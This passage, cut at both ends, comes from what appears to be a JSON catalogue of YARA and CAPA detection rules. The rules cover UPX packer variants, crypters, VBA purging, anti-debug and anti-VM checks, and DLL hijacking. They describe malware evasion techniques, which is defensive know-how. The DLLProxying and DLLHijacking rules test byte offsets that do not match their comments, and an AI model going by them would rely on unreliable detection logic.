B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_UPX_06_Anorganix: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_0991_0993_PE_DLL: PEiD\r\n{\r\n strings:\r\n $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE B0 00 00 00 8D BE 50 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_DLL: PEiD\r\n{\r\n strings:\r\n $a = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n $b = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPXLock_v10_CyberDoom_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 60 E8 2B 03 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_122_Markus_Laszlo: PEiD\r\n{\r\n strings:\r\n $a = { 31 2E 32 32 00 55 50 58 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_SCRAMBLER_306_OnToL: PEiD\r\n{\r\n strings:\r\n $a = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 BE ?? ?? ?? ?? 83 EC 04 89 34 24 B9 80 00 00 00 81 36 ?? ?? ?? ?? 50 B8 04 00 00 00 50 03 34 24 58 58 83 E9 03 E2 E9 EB D6 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_082_083_COM: PEiD\r\n{\r\n strings:\r\n $a = { 81 FC 00 00 77 02 CD 20 B9 00 00 BE 00 00 BF 00 00 BB 00 80 FD F3 A4 FC 87 F7 83 EE C6 19 ED 57 57 E9 00 00 55 50 58 21 0A 01 04 07 00 00 00 00 00 00 00 00 00 00 00 00 06 00 FF FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_290_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 ?? ?? ?? ?? 90 90 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule SkD_Undetectabler_Pro_20_No_UPX_Method_SkD_additional: PEiD\r\n{\r\n strings:\r\n $a = { 55 8B EC 83 C4 F0 B8 FC 26 00 10 E8 EC F3 FF FF 6A 0F E8 15 F5 FF FF E8 64 FD }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V300_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n strings:\r\n $a = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_DLL: PEiD\r\n{\r\n strings:\r\n $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 83 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_dos_exe: PEiD\r\n{\r\n strings:\r\n $a = { B9 ?? ?? BE ?? ?? 89 F7 1E A9 ?? ?? 8C C8 05 ?? ?? 8E D8 05 ?? ?? 8E C0 FD F3 A5 FC }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_05_snaker: PEiD\r\n{\r\n strings:\r\n $a = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 F9 00 7E 06 80 30 ?? 40 E2 F5 E9 ?? ?? ?? FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_UPX_0896_102_105_124_emadicius_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 64 A0 23 00 00 00 83 C5 06 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPXShit_006: PEiD\r\n{\r\n strings:\r\n $a = { B8 ?? ?? 43 00 B9 15 00 00 00 80 34 08 ?? E2 FA E9 D6 FF FF FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_070_EXE: PEiD\r\n{\r\n strings:\r\n $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 00 00 00 00 00 0E 0E 00 00 00 00 00 00 00 00 00 00 00 CB 55 50 58 21 08 00 02 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_v072_Laszlo_Markus: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 81 C6 B3 01 ?? ?? EB 0A ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v070_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 58 83 ?? ?? 50 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 83 ?? ?? 31 DB EB }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_10_12_CyberDoom_Team_X_BoB_BobSoft_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_V3042005_MANtiCORE: PEiD\r\n{\r\n strings:\r\n $a = { 60 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? ?? ?? ?? ?? E2 FA 61 68 ?? ?? ?? ?? C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Upx_v12_Marcus_Lazlo_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 05 A4 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 F2 31 C0 40 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 E6 31 C9 83 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_additional: PEiD\r\n{\r\n strings:\r\n $a = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Password_Protector_for_the_UPX_030_g0d: PEiD\r\n{\r\n strings:\r\n $a = { C8 50 01 00 60 E8 EC 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 44 69 61 6C 6F 67 42 6F 78 49 6E 64 69 72 65 63 74 50 61 72 61 6D 41 00 53 65 6E 64 4D 65 73 73 61 67 65 41 00 45 6E 64 44 69 61 6C 6F 67 00 00 00 55 8B EC 57 BF 00 00 00 00 33 C0 81 6D 0C 10 01 00 00 75 03 40 EB 13 83 7D 0C 01 75 0D 66 83 7D 10 0B 75 0B FF 75 14 8F 47 E4 5F 5D C2 10 00 66 83 7D 10 02 77 F4 74 0E 8D 4F A0 51 6A 40 6A 0D FF 77 E4 FF 57 E8 50 FF 75 08 FF 57 EC EB DB 84 08 C8 90 00 00 00 00 01 00 64 00 64 00 64 00 14 00 00 00 00 00 45 00 6E 00 74 00 65 00 72 00 20 00 50 00 61 00 73 00 73 00 77 00 6F 00 72 00 64 00 00 00 A0 00 00 50 00 00 02 00 05 00 05 00 5A 00 0A 00 0B 00 FF FF 81 00 00 00 00 00 5E FC 8D BE AA FE FF FF 8D 86 }\r\n $b = { C8 50 01 00 60 E8 EC 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 44 69 61 6C 6F 67 42 6F 78 49 6E 64 69 72 65 63 74 50 61 72 61 6D 41 00 53 65 6E 64 4D 65 73 73 61 67 65 41 00 45 6E 64 44 69 61 6C 6F }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_290_LZMA_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_UPX_06_Anorganix: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_Stub_c_Farb_rausch_Consumer_Consulting_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 E8 00 00 00 00 5B 83 C3 66 A4 FF D3 73 FB 31 C9 FF D3 73 14 31 C0 FF D3 73 1D 41 B0 10 FF D3 10 C0 73 FA 75 3C AA EB E2 E8 4A 00 00 00 49 E2 10 E8 40 00 00 00 EB 28 AC D1 E8 74 45 11 C9 EB 1C 91 48 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_wwwupxsourceforgenet: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? 00 8D BE ?? ?? ?? FF }\r\n $b = { 60 BE ?? ?0 ?? 00 8D BE ?? ?? F? FF }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_030_040_COM: PEiD\r\n{\r\n strings:\r\n $a = { B9 00 00 BE 00 00 BF C0 FF BD FF FF FD F3 A4 FC F7 E1 93 87 F7 83 C6 00 57 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Unknown_UPX_modifyer_additional: PEiD\r\n{\r\n strings:\r\n $a = { E8 02 00 00 00 CD 03 5A 81 C2 ?? ?? ?? ?? 81 C2 ?? ?? ?? ?? 89 D1 81 C1 3C 05 00 00 52 81 2A 33 53 45 12 83 C2 04 39 CA 7E F3 89 CA 8B 42 04 8D 18 29 02 BB 78 56 00 00 83 EA 04 3B 14 24 7D EC C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_020_COM: PEiD\r\n{\r\n strings:\r\n $a = { B9 00 00 BE 00 00 BF C0 FF BD FF FF FD F3 A4 FC F7 E1 93 87 F7 83 C6 31 57 57 E9 3C FE 55 50 58 21 03 01 02 87 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_125_Markus_Laszlo: PEiD\r\n{\r\n strings:\r\n $a = { 31 2E 32 35 00 55 50 58 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_dos_exe_Hint_DOS_EP: PEiD\r\n{\r\n strings:\r\n $a = { B9 ?? ?? BE ?? ?? 89 F7 1E A9 ?? ?? 8C C8 05 ?? ?? 8E D8 05 ?? ?? 8E C0 FD F3 A5 FC }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_072: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPXFreak_01_Borland_Delphi_HMX0101: PEiD\r\n{\r\n strings:\r\n $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Unknown_UPX_Scrambler_vna: PEiD\r\n{\r\n strings:\r\n $a = { C7 45 FC ?? ?? ?? ?? 6A 04 6A 00 6A 00 68 FF FF FB FF FF 15 ?? ?? ?? ?? 85 C0 7E ?? 6A 00 FF 15 ?? ?? ?? ?? 8B 45 FC 8B 40 04 83 E8 03 8B 4D FC 89 41 04 83 65 F4 00 EB ?? 8B 45 F4 40 89 45 F4 8B 45 FC 8B 4D F4 3B 48 04 73 ?? 8B 45 FC 8B 40 04 2B 45 F4 8B 4D FC 8B 09 8B 55 FC 8B 44 01 FF 33 42 0C 8B 4D FC 8B 49 04 2B 4D F4 8B 55 FC 8B 12 89 44 11 FF EB ?? 8B 45 FC 8B 40 08 89 45 F8 8B 45 F8 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Unknown_UPX_or_File_modifyer: PEiD\r\n{\r\n strings:\r\n $a = { E8 02 00 00 00 CD 03 5A 81 C2 86 EA FE FF 81 C2 45 23 01 00 89 D1 81 C1 3C 05 00 00 52 81 2A 33 53 45 12 83 C2 04 39 CA 7E F3 89 CA 8B 42 04 8D 18 29 02 BB 78 56 00 00 83 EA 04 3B 14 24 7D EC C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_DLL_Hint_WIN_EP: PEiD\r\n{\r\n strings:\r\n $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 58 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_051_072_COM: PEiD\r\n{\r\n strings:\r\n $a = { B9 00 00 BE 00 00 BF C0 FF FD F3 A4 FC F7 E1 93 87 F7 83 EE 00 19 ED 57 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}"
},
{
"id": 94,
"key": "upx-packer-detection",
"type": {
"id": 2,
"name": "CAPA",
"syntax_lang": "yaml"
},
"name": "UPX Packer Detection",
"rule": "rule:\r\n meta:\r\n name: packed with UPX\r\n namespace: anti-analysis/packer/upx\r\n authors:\r\n - william.ballenthin@mandiant.com\r\n scope: file\r\n att&ck:\r\n - Defense Evasion::Obfuscated Files or Information::Software Packing [T1027.002]\r\n mbc:\r\n - Anti-Static Analysis::Software Packing::UPX [F0001.008]\r\n examples:\r\n - CD2CBA9E6313E8DF2C1273593E649682\r\n - Practical Malware Analysis Lab 01-02.exe_:0x0401000\r\n features:\r\n - or:\r\n - and:\r\n - format: pe\r\n - or:\r\n - section: UPX0\r\n - section: UPX1\r\n - and:\r\n - format: elf\r\n - or:\r\n - string: \"UPX!\""
},
{
"id": 162,
"key": "vbapurging",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "VBAPurging",
"rule": "rule FEYE_OLE_VBAPurged_2 {\r\n meta:\r\n author = \"Michael Bailey (@mykill), Jonell Baltazar, Alyssa Rahman (@ramen0x3f), Joseph Reyes\"\r\n description = \"This file has a suspicious _VBA_PROJECT header and a small _VBA_PROJECT stream. This may be evidence of the VBA purging tool OfficePurge or a tool-generated document.\"\r\n strings:\r\n $vba_proj = { 5F 00 56 00 42 00 41 00 5F 00 50 00 52 00 4F 00 4A 00 45 00 43 00 54 00 00 00 00 00 00 00 00 00 }\r\n $cc61 = {CC 61 FF FF 00 00 00}\r\n condition:\r\n uint32(0) == 0xe011cfd0 and ( uint32(@vba_proj[1] + 0x78) >= 0x07 ) and ( uint32(@vba_proj[1] + 0x78) < 0xff ) and $cc61\r\n}"
},
{
"id": 146,
"key": "yara_base64",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_Base64",
"rule": "rule golang_base64_enc {\r\n\tmeta:\r\n\t\tauthor = \"RussianPanda\"\r\n\t\tdecription = \"Detects Base64 Encoding and Decoding patterns in Golang binaries\"\r\n \treference = \"https://unprotect.it/technique/base64/\"\r\n\t\tdate = \"1/10/2024\"\r\n\t\thash = \"509a359b4d0cd993497671b91255c3775628b078cde31a32158c1bc3b2ce461c\"\r\n\tstrings:\r\n\t $s1 = {62 61 73 65 36 34 2e 53 74 64 45 6e 63 6f 64 69 6e 67 2e 45 6e 63 6f 64 65 54 6f 53 74 72 69 6e 67 28 [0-15] 29}\r\n\t $s2 = {62 61 73 65 36 34 2e 53 74 64 45 6e 63 6f 64 69 6e 67 2e 44 65 63 6f 64 65 53 74 72 69 6e 67 28 [0-15] 29}\r\n\t $s3 = {69 66 20 65 72 72 20 21 3D 20 6E 69 6C 20 7B}\r\n\t\t$s4 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\r\n \tcondition:\r\n\t\tall of ($s*) \r\n \tand uint16(0) == 0x5A4D\r\n}\r\n\r\n\r\nrule base64_enc {\r\n\tmeta:\r\n\t\tauthor = \"RussianPanda\"\r\n\t\tdecription = \"Detects Base64 Encoding\"\r\n \treference = \"https://unprotect.it/technique/base64/\"\r\n\t\tdate = \"1/10/2024\"\r\n\t\thash = \"09506d1af5d8e6570b2b7d05143f444f5685d2a9f3304780ef376edf7b2d79e6\"\r\n\tstrings:\r\n\t\t$s2 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\r\n \t$s3 = {83 E? 3F}\r\n \tcondition:\r\n\t\tall of ($s*) \r\n \tand uint16(0) == 0x5A4D\r\n\t\t\r\n}"
},
{
"id": 156,
"key": "yara_buildcommdcbandtimeouts",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_BuildCommDCBAndTimeouts",
"rule": "rule BuildCommDCBAndTimeouts \r\n{\r\n meta:\r\n author = \"Unprotect\"\r\n contributors = \"Huntress Research Team | Unprotect Project\"\r\n description = \"Detects usage of BuildCommDCBAndTimeouts function call\"\r\n status = \"experimental\"\r\n\r\n strings:\r\n $s1 = \"jhl46745fghb\" ascii wide nocase\r\n $s2 = \"BuildCommDCBAndTimeouts\" ascii wide nocase\r\n\r\n condition:\r\n uint16(0) == 0x5a4d and ($s2 or ($s2 and $s1))\r\n}"
},
{
"id": 138,
"key": "yara_crypt_hxor",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_CRYPT_hXOR",
"rule": "rule SI_CRYPT_hXOR_Jan24 : Crypter {\r\n\r\n meta:\r\n version = \"1.0\"\r\n date = \"2024-01-04\"\r\n modified = \"2024-01-18\"\r\n status = \"RELEASED\"\r\n sharing = \"TLP:CLEAR\"\r\n source = \"SECUINFRA Falcon Team\"\r\n author = \"Marius Genheimer @ Falcon Team\"\r\n description = \"Detects executables packed/encrypted with the hXOR-Packer open-source crypter.\"\r\n category = \"TOOL\"\r\n mitre_att = \"T1027.002\"\r\n actor_type = \"CRIMEWARE\"\r\n reference = \"https://github.com/akuafif/hXOR-Packer\"\r\n hash = \"7712186f3e91573ea1bb0cc9f85d35915742b165f9e8ed3d3e795aa5e699230f\"\r\n minimum_yara = \"2.0.0\"\r\n best_before = \"2025-01-04\"\r\n\r\n strings:\r\n //This rule has been validated for the compression, encryption and compression+encryption modes of hXOR\r\n\r\n //Signature to locate the payload\r\n $binSignature = {46 49 46 41} \r\n\r\n //Strings likely to be removed in attempts to conceal crypter\r\n $s_1 = \"hXOR Un-Packer by Afif, 2012\"\r\n $s_2 = \"C:\\\\Users\\\\sony\\\\Desktop\\\\Packer\\\\\"\r\n $s_3 = \"H:\\\\Libraries\\\\My Documents\\\\Dropbox\\\\Ngee Ann Poly\\\\Semester 5\\\\Packer\"\r\n $s_4 = \"Scanning for Sandboxie...\"\r\n $s_5 = \"Scanning for VMware...\"\r\n $s_6 = \"Executing from Memory >>>>\"\r\n $s_7 = \"Extracting >>>>\"\r\n $s_8 = \"Decompressing >>>>\"\r\n $s_9 = \"Decrypting >>>>\"\r\n\r\n //Anti-Analysis\r\n $aa_1 = \"SbieDll.dll\"\r\n $aa_2 = \"VMwareUser.exe\"\r\n $aa_3 = \"GetTickCount\"\r\n $aa_4 = \"CreateToolhelp32Snapshot\"\r\n\r\n condition:\r\n uint16(0) == 0x5A4D\r\n and uint16(0x28) != 0x0000 //IMAGE_DOS_HEADER.e_res2[0] contains offset for payload\r\n and $binSignature in (200000..filesize)\r\n and for all of ($s_*): (# >= 0) //these strings are optional\r\n and 3 of ($aa_*)\r\n}"
},
{
"id": 129,
"key": "yara_checkname",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_CheckName",
"rule": "rule MalwareNameEvasion\r\n{\r\n strings:\r\n // Check for the GetModuleFileName() function call\r\n $get_module_filename = \"GetModuleFileName\"\r\n\r\n // Check for the find_last_of() method call\r\n $find_last_of = \"find_last_of\"\r\n\r\n // Check for the std::string data type\r\n $string = \"std::string\"\r\n\r\n // Check for the \"\\\\/\" string\r\n $backslash_slash = \"\\\\\\\\/\"\r\n\r\n // Check for the \"sample.exe\" string\r\n $sample_exe = \"sample.exe\"\r\n\r\n // Check for the \"malware.exe\" string\r\n $malware_exe = \"malware.exe\"\r\n\r\n condition:\r\n // Check if all the required strings are present in the code\r\n all of them\r\n}"
},
{
"id": 153,
"key": "yara_check_install_software",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_Check_Install_software",
"rule": "rule check_installed_software {\r\n\r\n meta:\r\n author = \"RussianPanda\"\r\n date = \"1/14/2024\"\r\n reference = \"https://unprotect.it/technique/checking-installed-software/\"\r\n hash = \"db44d4cd1ea8142790a6b26880b41ee23de5db5c2a63afb9ee54585882f1aa07\"\r\n\r\n strings:\r\n $d1 = \"DisplayVersion\"\r\n $u1 = \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\"\r\n $reg = \"RegOpenKeyExA\"\r\n $h = {68 (01|02) 00 00 80}\r\n\r\n condition:\r\n uint16(0) == 0x5A4D\r\n and for any i in (1..#u1) : ($d1 in (@u1[i] - 200..@u1[i] + 200))\r\n and $reg and $h\r\n\r\n}"
},
{
"id": 124,
"key": "yara_dllproxying",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_DLLProxying",
"rule": "rule DLLProxying {\r\n condition:\r\n // Check for presence of DLL_PROCESS_ATTACH in DllMain function\r\n uint16(0) == 0x6461 and (\r\n // Check for the presence of LoadLibrary, which is used to load the legitimate DLL\r\n uint32(2) == 0x6C6C6100 and uint32(6) == 0x6574726F and\r\n \r\n // Check for the presence of GetProcAddress, which is used to retrieve the addresses of the functions in the legitimate DLL\r\n uint32(10) == 0x72630067 and uint32(14) == 0x61647079 and uint32(18) == 0x61636F00 and uint32(22) == 0x0072696E and\r\n \r\n // Check for the presence of a function that will be used to redirect function calls to the legitimate DLL\r\n // This example uses a function named \"ProxyFunction\", but the function name can be anything\r\n uint32(26) == 0x646E6900 and uint32(30) == 0x00667379\r\n )\r\n // Check for presence of dllexport attribute on the function that redirects calls to the legitimate DLL\r\n // This example uses a function named \"ProxyFunction\", but the function name can be anything\r\n and (pe.exports(\"ProxyFunction\") or pe.exports(\"ProxyFunction@0\"))\r\n}"
},
{
"id": 123,
"key": "yara_dllsearchorderhijacking",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_DLLSearchOrderHijacking",
"rule": "rule DLLHijacking {\r\n condition:\r\n // Check for presence of DLL_PROCESS_ATTACH in DllMain function\r\n uint16(0) == 0x6461 and (\r\n // Check for the presence of CreateThread, which is used to start the main function\r\n uint32(2) == 0x74006872 and uint32(6) == 0x00006563 and uint32(10) == 0x74616843 and\r\n \r\n // Check for the presence of Main function\r\n uint32(14) == 0x6E69006D and uint32(18) == 0x0064614D\r\n )\r\n // Check for presence of dllexport attribute\r\n and (pe.exports(\"DnsFreeConfigStructure\") or pe.exports(\"DnsFreeConfigStructure@0\"))\r\n}"
},
{
"id": 4,
"key": "yara_debuggercheck_globalflags",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_DebuggerCheck_GlobalFlags",
"rule": "rule DebuggerCheck__GlobalFlags {\r\n meta:\r\n\tdescription = \"Rule to detect NtGlobalFlags debugger check\"\r\n author = \"Thibault Seret\"\r\n date = \"2020-09-26\"\r\n strings:\r\n $s1 = \"NtGlobalFlags\"\r\n condition:\r\n any of them\r\n}"
},
{
"id": 6,
"key": "yara_debuggercheck__remoteapi",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_DebuggerCheck__RemoteAPI",
"rule": "rule DebuggerCheck__RemoteAPI {\r\n meta:\r\n description = \"Rule to RemoteAPI debugger check\"\r\n author = \"Thibault Seret\"\r\n date = \"2020-09-26\"\r\n strings:\r\n $s1 =\"CheckRemoteDebuggerPresent\"\r\n condition:\r\n any of them\r\n}"
},
{
"id": 127,
"key": "yara_detectparentprocess",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_DetectParentProcess",
"rule": "rule ParentProcessEvasion\r\n{\r\n strings:\r\n // Check for the CreateToolhelp32Snapshot() function call\r\n $create_snapshot = \"CreateToolhelp32Snapshot\"\r\n\r\n // Check for the Process32First() function call\r\n $process32_first = \"Process32First\"\r\n\r\n // Check for the Process32Next() function call\r\n $process32_next = \"Process32Next\"\r\n\r\n // Check for the GetCurrentProcessId() function call\r\n $get_current_pid = \"GetCurrentProcessId\"\r\n\r\n condition:\r\n // Check if all the required strings are present in the code\r\n all of them\r\n}"
},
{
"id": 160,
"key": "yara_detect_alkhaser_antidebug_writewatch",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_Detect_AlKhaser_AntiDebug_WriteWatch",
"rule": "rule YARA_Detect_AlKhaser_AntiDebug_WriteWatch\r\n{\r\n meta:\r\n description = \"Default invalid parameter values of Al-Khaser's Anti-Debug technique (VirtualAlloc/MEM_WRITE_WATCH). Used for checking API hooks in debuggers/sandboxes.\"\r\n author = \"@albertzsigovits\"\r\n date = \"2024-07-10\"\r\n reference = \"https://github.com/LordNoteworthy/al-khaser/blob/967afa0d783ff9625caf1b069e3cd1246836b09f/al-khaser/AntiDebug/WriteWatch.cpp#L85\"\r\n sha256 = \"e07383f6a340d8422a69b1d40cf848652165517407f7d0dc7260eed4a76499b3\"\r\n\r\n strings:\r\n $ = \"%ThisIsAnInvalidEnvironmentVariableName?[]<>@\\\\;*!-{}#:/~%\" ascii wide\r\n $ = \"%ThisIsAnInvalidFileName?[]<>@\\\\;*!-{}#:/~%\" ascii wide\r\n condition:\r\n uint16(0) == 0x5A4D\r\n and uint32(uint32(0x3C)) == 0x00004550\r\n and any of them\r\n}"
},
{
"id": 8,
"key": "yara_detect_antivmwithtemperature",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "YARA_Detect_AntiVMWithTemperature",
"rule": "rule Detect_AntiVMWithTemperature {\r\n meta:\r\n description = \"Rue to detect AntiVMwithTemperature technique\"\r\n author = \"Thibault Seret\"\r\n date = \"2020-09-26\"\r\n strings:\r\n $s1 = {72 6f 6f 74 5c 57 4d 49}\r\n // root\\WMI\r\n $s2 = {53 45 4c 45 43 54 20 2a 20 46 52 4f 4d 20 4d 53 41 63 70 69 5f 54 68 65 72 6d 61 6c 5a 6f 6e 65 54 65 6d 70 65 72 61 74 75 72 65}\r\n // SELECT * FROM MSAcpi_ThermalZoneTemperature\r\n $s3 = {43 75 72 72 65 6e 74 54 65 6d 70 65 72 61 74 75 72 65}\r\n // CurrentTemperature\r\n \r\n condition:\r\n all of them\r\n}"
},
{
"id": 109,
